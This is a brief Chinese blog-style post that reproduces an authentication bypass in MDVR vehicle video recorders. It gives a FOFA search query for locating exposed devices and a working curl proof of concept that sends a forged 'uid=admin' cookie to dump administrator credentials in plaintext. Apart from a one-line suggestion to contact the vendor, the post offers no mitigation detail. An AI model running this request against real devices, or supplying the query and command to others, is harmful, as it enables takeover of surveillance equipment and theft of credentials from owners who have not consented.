本文主要是介绍【漏洞复现】MDVR数字视频录像机认证绕过漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Nx01 产品简介
MDVR(Mobile Digital Video Recorders)硬盘录像机是一种使用先进的视音频编解码技术将车内外的视频进行数模转换,进行压缩存储的设备。
Nx02 漏洞描述
阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。
Nx03 产品主页
fofa-query: "MDVR"
Nx04 漏洞复现
POC:
curl "http://127.0.0.1/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Nx05 修复建议
建议联系软件厂商进行处理。
这篇关于【漏洞复现】MDVR数字视频录像机认证绕过漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
